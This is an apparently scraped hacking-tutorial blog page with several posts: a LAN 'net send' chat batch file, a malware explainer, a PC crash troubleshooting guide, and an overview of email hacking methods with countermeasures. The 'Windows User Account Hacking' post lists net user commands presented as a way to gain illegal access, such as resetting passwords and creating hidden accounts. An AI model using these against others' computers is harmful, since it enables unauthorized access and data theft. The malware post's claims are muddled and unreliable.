What Is Hacking
The Art of exploring various security breaches is termed as Hacking.Computer Hackers have been around for so many years...
Hacking
Hacker is a word that has two meanings:Traditionally, a Hacker is someone who likes to play with Software or Electronic Systems...
Hacker Vs Cracker
What Is the Difference Between a Hacker and a Cracker? Many articles have been written about the difference between Hackers and crackers, which attempt to correct public misconceptions about hacking...
Saturday 3 August 2013
Thursday 28 February 2013
Chat Using Command Prompt
06:41
Thomas Rajasekar
296 comments
To Chat Using Command Prompt Perform the following Steps
Step1-You would require the IP Address of the person you wish to chat.
Step2-Open Your Notepad and type the following code.
Step3-Now save this code as "Messenger.Bat".
Step4 -Drag this file(Messenger.Bat file) over the command prompt and press Enter.
Step5-You would then see something like this:
Step1-You would require the IP Address of the person you wish to chat.
Step2-Open Your Notepad and type the following code.
@echo off:
A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A3.
A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A3.
Step3-Now save this code as "Messenger.Bat".
Step4 -Drag this file(Messenger.Bat file) over the command prompt and press Enter.
Step5-You would then see something like this:
MESSENGER
User:
User:
Step6:Next to user type the IP Address of the computer you wish to contact.
Step7-Now all you need to do is press "Enter" and start chatting.
Note-This Works only With a Lan Connection.This might not Work in Vista and Windows7
Friday 3 August 2012
What Is A Malware
09:17
Thomas Rajasekar
29 comments
What is Malware? Malware are tools and
programs that one sets up to infect another’s system and directs them somewhere
else.the latest malware exploit that was created back in November 2011.
In November 2011, a nasty
exploit to computers that redirected DNS Servers was created and used. This
nasty virus was soon diverted by the FBI, in possibly the most friendly and
fair way our government has ever done. For months now the FBI has homed servers
to divert and fix what this malware program caused, but on July 9th 2012 the
FBI announced ending their operation and shut down these servers. The effects
have been estimated to great measures, to the fears that millions of Americans
will lose connection to the internet,and the world going up in flames due to
lack of communication. Since the Feds announcement corporations like Google
have announced programs that have been running now since the 23rd of May. These
programs scan your
computer for this DNS switcher program
"aka the nasty malware program".
Now, it is true most virus
databases are able to track down and delete malware programs on your system,
but in the new world with our new internet based technology, that may not be
the case anymore. So what does this program do? What has been leaked out of the
feds about it? Well you can rest assured our brother was arrested in November
shortly after the release of his program. Due to this fact they are assured
that they have fixed the problem, due to higher thinking we can only think they
have over looked something.
The only thing we can hope
for is that this will only affect a small handful of systems. Common users
mostly. So what is malware? Malware are programs that force you to do what
someone else wants. Malware programs create bot nets, using innocent peoples
computers/common user systems as weapons without there knowledge. For the
longest time apple users were told they wouldn’t have to worry about this
issue. Late April, early May this was proven false which also made all systems
at risk now.
So you’re probably
wondering how one would download one of these programs,which is a really good
question. Back in the dark ages, they had to be installed through third party
programs from the downloads you got for games software from untrusted sources.
Today, in the modern age of technology, these programs, like all viruses, can
be automatically uploaded to your system through cookies and random file
downloads websites through the many games we play online. Many of you readers
are also at risk due to the fact IRC servers send data packets that may contain
such files.
The only luck is that certain ISPs change up there DNS
servers monthly, corporations like Comcast, while they do this they also
release and renew IP address granting you probably the most open and free way
to have anonymous web browsing at least for the first 20 minutes from the
renewal.
Monday 30 July 2012
Windows User Account Hacking
09:01
Thomas Rajasekar
99 comments
Windows user Account can be Hacked by using Command Prompt.This type of Hacking is done in order to gain illegal access to the user account and steal the data in the system.
Note:This type of Hacking can be done only on User Accounts which have Administrative rights.
Note:This type of Hacking can be done only on User Accounts which have Administrative rights.
Commands Used For User Account Hacking
1.To See all the account present on the Computer.
Net user
2.To change the password of a User account without knowing the old password.
Net user administrator *
3.To make a new user account.
Net user hacker /add
4.To Delete the existing user account.
Net user hacker /delete
5.To make a hidden account in the computer.{Works only with Windows XP}
Net User hacker /add
Net localgroups users hacker /delete
Note:-
To login to this hidden account press
Ctrl+Alt+Delete+Delete
And give the hidden user name in the user name field and password in password field respectively.
The term hacker refers the user name or name of the account.
Counter Measures of Windows User Account Attack
1.Change the Boot sequence in the BIOS setup.Keep Hard Disk as 1st boot drive, then CD\DVD drive as 2nd boot device and Removable port as 3rd boot device.
2.Put the BIOS password.
3.Put the physical lock behind the cabinet of PC. (Put Lock).
Saturday 21 July 2012
10 Reasons Why PC's crash
10:30
Thomas Rajasekar
14 comments
Fatal error: The system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."
You have just been struck by the Blue Screen of Death. Anyone who uses Microsoft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?
1 Hardware conflict
The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.
For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.
If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:
* Start-Settings-Control Panel-System-Device Manager.
Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.
Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.
Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.
To be fair to Microsoft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.
2 Bad Ram
Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.
But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.
One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.
Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.
EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.
3 BIOS settings
Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.
Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.
A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.
Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).
4 Hard disk drives
After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to
* Start-Programs-Accessories-System Tools-Disk Defragmenter
This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.
The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).
Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to
* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.
Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.
Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to
* Start-Programs-Accessories-System Tools-ScanDisk
Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.
5 Fatal OE exceptions and VXD errors
Fatal OE exception errors and VXD errors are often caused by video card problems.
These can often be resolved easily by reducing the resolution of the video display. Go to
* Start-Settings-Control Panel-Display-Settings
Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.
If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to
* Start-Settings-Control Panel-System-Device Manager
Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.
If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.
The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.
Another useful way to resolve video problems is to go to
* Start-Settings-Control Panel-System-Performance-Graphics
Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).
Look up your video card's manufacturer on the internet and search for the most recent drivers for it.
6 Viruses
Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to
* Start-Settings-Control Panel-Add/Remove Programs
Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.
A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.
An excellent antivirus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).
7 Printers
The action of sending a document to print creates a bigger file, often called a postscript file.
Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.
If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.
8 Software
A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.
The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.
Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org
Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.
Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.
Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.
Remember to restore all the BIOS settings back to their former settings following installation.
9 Overheating
Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.
One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com
CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.
10 Power supply problems
With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.
If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.
It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.
Wednesday 18 July 2012
EMAIL HACKING
10:11
Thomas Rajasekar
357 comments
Email hacking is illegal access to
an email account or email correspondence.Email on the internet is now commonly sent by
the Simple Mail Transfer Protocol (SMTP). This does not encrypt the text
of emails and so intercepted mail can be read easily unless the user adds their
own encryption. The identity of
the sender or addressee of an email is not authenticated and this provides opportunities for
abuse such as spoofing.
Email Spoofing
Email spoofing is a
technique used by hackers to fraudulently send email messages in which the
sender address and other parts of the email header are altered to appear as
though the email originated from a source other than its actual source. Hackers
use this method to disguise the actual email address from which phishing and
spam messages are sent and often use email spoofing in conjunction with Web
page spoofing to trick users into providing personal and confidential
information.
Software is usually used
to collect or generate the email addresses that are spoofed. Hackers may create
a virus that examines the contact information on an infected computer. That
information is collected and sent to the hacker who then uses another piece of
software a mass email program to send
out bogus emails using the addresses collected.
Alternatively, hackers
may use software that generates random email addresses to use to disguise the
actual origin of the message being sent.
Types of email hacking
1.Phishing
2.RATS(remote administration
tools)
3.Key logging
4.Social Engineering(technique
used by attacker by answering security question)
5.Side jacking(Session Hijacking)
6.From the mail server
1.Phishing
Phishing is an e-mail fraud method in which the Hacker
sends out legitimate-looking email in an attempt to gather personal and
financial information from recipients. Typically, the messages appear to come
from well known and trustworthy Web sites. Web sites that are frequently
spoofed by phishers include PayPal,
eBay, MSN, Yahoo, Best Buy, and America Online. A phishing expedition, like
the fishing expedition it's named for, is a speculative venture: the phisher
puts the lure hoping to fool at least a few of the prey that encounter the
bait.
Techniques
used within Phishing emails
1.Official
looking and sounding emails
2.Copies
of legitimate corporate emails with minor URL changes
3.HTML
based email used to confuse target URL information
4.Standard
virus/worm attachments to emails
5.A excess
of anti spam-detection inclusions
6.Crafting
of “personalized” or unique email messages
7.Fake
postings to popular message boards and mailing lists
8.Use
of fake “Mail From:” addresses and open mail relays for disguising the source
of the email
An Example of a Fake Gmail Home Page
Things to keep
in mind to avoid Phising attacks
1
Most fake communications convey a sense of urgency by threatening
discontinued service
2.Many fraudulent emails contain misspellings, incorrect grammar,
and poor punctuation.
3
Links within the fake email may appear valid but deliver you to a
fradulent site.
4.Phishing emails often use generic salutations like "Dear
Customer," or "Dear account holder," instead of your nameThe address from which the email was sent is often not one from the
company it claims to be.
An Example Of a Fake Email
2.RATS(remote administration
tools)
A RAT is also a shortcut
called Remote Administrator Tool. It is mostly used for malicious
purposes,
such as controlling PC’s, stealing victims data, deleting or editing some
files. You
can only infect someone by sending him file called Server and they
need to click it.
3.Key logging
Keystroke
logging (more often
called keylogging or "keyloggers") is the
action of tracking (or logging) the keys struck on a keyboard, typically in a secret manner so that the person using the
keyboard is unaware that their actions are being monitored. There are numerous
key logging methods, ranging from hardware and software-based approaches to electromagnetic and acoustic analysis.
Types Of Keyloggers
1.Software-based Keyloggers
1.Software-based Keyloggers
2.Hardware-based Keyloggers
1.Software-based Keyloggers
Software based Keyloggers record each and every keystroke typed with the help of a Software.These keystrokes are stored in a log file.
An example of Keystroke log file
2.Hardware-based Keyloggers
Hardware based keyloggers record each and every keystroke typed with the help of a
Hardware device.
An Example of a typical Hardware Keylogger
An Example of how Hardware Keyloggers are connected to the system.
Countermeasures
Use of Virtual keyboard or On-Screen Keyborad can be an effective method to avoid
keyloggers.But,it will not work under certain circumstances.
4.Social Engineering(technique used by attacker by
answering security question)
Social
engineering is the
human side of breaking into a corporate network. Companies like ours with
authentication processes, firewalls, VPNs and network monitoring software are
still wide open to an attack if an employee unwittingly gives away key
information in an email, by answering questions over the phone with someone
they don’t know or failing to ask the right questions.
Forms of Social Engineering
Social
engineering is not
limited to phone calls; many organizations have reported cases involving
visitors impersonating a telephone repair technician requesting access to a
wiring closet or a new member of the IT department needing help accessing a
file.
People, for
the most part, look at social engineering as an attack on their intelligence and
no one wants to be considered “ignorant” enough to have been a victim. It’s
important to remember that no matter who you are, you are susceptible to a social
engineering attack.
If you
suspect social engineering – don’t be afraid to ask questions
and/or notify your IT department. If a caller requests information that is
technical in nature, please refer them to your IT department.
How to prevent social Engineering
1.usernames;
Administrators should know it or can find out themselves
2.passwords;
Administrators can ask your to enter it into the computer, but don't tell
anyone
3.ID
numbers
4.PIN
numbers
5.server
names
6.system
information
Session Hijacking is an attack by which a hacker exploits a valid
computer session and gains access to a client’s session identifier. Since HTTP
is a stateless protocol, when a user logs into a website, a session is created
on that Web Server for that user, this session contains all this user's
information being used by the
server so the username and password is not needed at every page request. The
server uses a unique identifier(Session Identifier) to authenticate this user
to this session, this session identifier is passed between the web server and
the user's computer at every request. Session Hijacking is an attack by which
the hacker steals this user's session identifier and then sends this session
identifier as their own to the server and tricks the server into thinking they
are that user.
After
gaining access to a client’s session identifier for a website, the hacker then
injects the client’s session identifier into his/her browser. From then on,
when that attacker connects to that website, since his session identifier is
the same as the authentic user, he will be logged in as that userand will have
access to all of that user’s information and privileges on that website. Note -
attackers cannot get a user’s password using session hijacking.
1. Use
Secure Connections (Achieved through Secure Socket Layer(SSL) as much as
possible, since SSL creates an encrypted connection between the client and
server, any data the attacker steals during this transfer would be useless to
them. However, SSL does not fully secure against this attack, and hackers can
still use session hijacking even over HTTPS
2. Regenerate
user's session identifier often, therefore, even though the attacker may manage
to steal a user's session identifier, when it is regenerated, the Session
Identifier he stole would be useless.
3. You
can implement an IP Address Check to match a user's Session Identifier to
his/her IP Address. However this may have its limitations.
6.From the mail server